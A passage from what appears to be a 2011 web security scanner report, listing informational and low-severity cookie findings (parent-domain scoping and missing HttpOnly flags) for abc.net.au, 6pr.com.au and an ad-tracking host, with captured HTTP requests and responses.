The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/jquery/jquery-latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 03:29:29 GMT
ETag: "1a5c576-164ce-2f69840"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 91342
Cache-Control: max-age=35387
Expires: Thu, 08 Sep 2011 00:04:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853242; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/*!
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

8.82. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...

8.83. http://www.wtp101.com/pull_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=rubicon HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Fri, 06 Sep 2013 14:14:28 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


9. Cookie without HttpOnly flag set  previous  next
There are 96 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. http://www.6pr.com.au/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.6pr.com.au
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: